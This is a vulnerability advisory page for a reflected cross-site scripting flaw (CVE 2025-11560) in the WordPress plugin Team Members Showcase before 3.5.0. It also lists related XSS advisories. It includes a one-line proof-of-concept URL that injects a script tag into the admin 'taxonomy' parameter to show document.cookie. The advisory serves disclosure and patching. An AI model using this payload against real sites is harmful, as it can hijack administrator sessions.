Team Members Showcase < 3.5.0 – Reflected XSS | CVE 2025-11560 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter before outputting it back in the page, leading to reflected cross-site scripting, which could be used against high-privilege users such as admins.

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=wps-team-members&page=taxonomies&taxonomy=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Affects Plugins

Fixed in 3.5.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Gregory Allegoet

Submitter

Gregory Allegoet

Verified

Yes

WPVDB ID

64d7a074-3f1d-4b09-8e96-d76b9fb3c41e

Timeline

Publicly Published

2025-10-22 (about 2 months ago)

Added

2025-10-22 (about 2 months ago)

Last Updated

2025-10-22 (about 2 months ago)

Other

Published

Title

Published

2025-09-25

Title

Popup Maker < 1.21.0 - Contributor+ Stored XSS via title Parameter

Published

2024-05-13

Title

Essential Addons for Elementor < 5.9.21 - Contributor+ Stored Cross-Site Scripting

Published

2012-06-28

Title

Job Manager < 0.7.19 - Multiple XSS

Published

2014-09-16

Title

WordPress 3.0 - 3.9.1 Authenticated Cross-Site Scripting (XSS) in Multisite

Published

2014-08-01

Title

Wordpress 1.5.1 - 2.0.2 wp-register.php Multiple Parameter XSS